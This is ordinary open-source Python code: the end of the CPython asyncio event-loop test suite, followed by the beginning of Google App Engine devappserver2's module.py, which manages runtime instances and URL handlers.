prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
def test_get_event_loop_new_process(self):
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.unpatch_get_running_loop()
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = Coro()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'Coro()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
self.assertIs(asyncio._get_running_loop(), None)
if __name__ == '__main__':
unittest.main()
|
module.py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_server
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_server.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_server.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
